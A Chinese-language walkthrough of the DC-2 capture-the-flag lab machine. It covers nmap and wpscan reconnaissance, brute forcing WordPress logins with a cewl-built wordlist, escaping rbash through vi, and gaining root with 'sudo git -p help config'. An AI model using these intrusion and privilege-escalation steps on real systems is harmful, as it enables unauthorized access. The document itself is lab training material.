DC系列 DC:2

DC:2

信息收集

IP收集

使用arp-scan 对网段进行扫描

得到目标机ip之后使用nmap -A -p- -sV -sT 10.4.7.21对该ip进行详细扫描

可以看到该目标机开放着ssh和http服务得到端口7744和80

网页收集

访问网页发现无法访问

应该是被重定向到了dc-2这个域名我们做个域名绑定修改本地hosts文件C:\Windows\System32\drivers\etc\hosts
在最后一行加入10.4.7.21 dc-2

再次访问网站发现访问成功了

根据指纹发现是wordpress cms内容管理系统 直接用wpscan进行扫描

用wpscan工具进行扫描 wpscan --url http://dc-2 --enumerate u --api-token 后面为token可以在wpscan官网获取

扫描之后得到三个用户名admin，jerry，tom

我们将他们收集成用户名字典或许一会可以用到

往上翻看扫描出来的信息发现一个网址

访问这个网址http://dc-2/index.php/comments/feed/

在这个网址里又发现一个网址继续访问是一个留言板一样的界面

继续翻找信息在flag页面中发现提示用cewl进行网页爬取密码

进行密码爬取cewl -d 3 http://dc-2/ >passwd.txt -d是深度

既然我们拥有用户名字典和密码字典我们进行一个爆破
wpscan自带爆破功能wpscan --url http://dc-2 -U account.txt -P passwd.txt

进行爆破爆破出来两对密码
jerry / adipiscing
tom / parturient

我们尝试进行登录

我们用jerry成功登录进来了

在页面里找到了flag2

没有什么可以利用的信息
尝试上传文件

发现上传不了登录tom的账号试试

rbash绕过

还是没有线索用已知账号密码尝试ssh登录
jerry密码错误尝试tom

成功登录

输入whoami发现被rbash限制

进行rbash逃逸试了很多方法最后在vi命令里的末行模式使用set shell=/bin/sh

然后再次调用末行模式输入shell就解除rbash限制了

出来之后发现已经不是rbash但是命令还是不能用

我们设置环境变量export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin发现命令就可以用了

提权

尝试sudo提权发现这个用户不能用sudo

用find的命令查找二进制文件/usr/bin$ find / -perm -u=s -type f 2>/dev/null

很明显没有利用的文件
搜索漏洞库也没有漏洞

找找文件里面也没有什么线索
看见可以用su 尝试切换jerry用户

登进来了可能是限制了jerry用户的远程登录
使用sudo -l 发现可以用root身份执行git

直接git提权sudo git -p help config

!/bin/sh

获得flag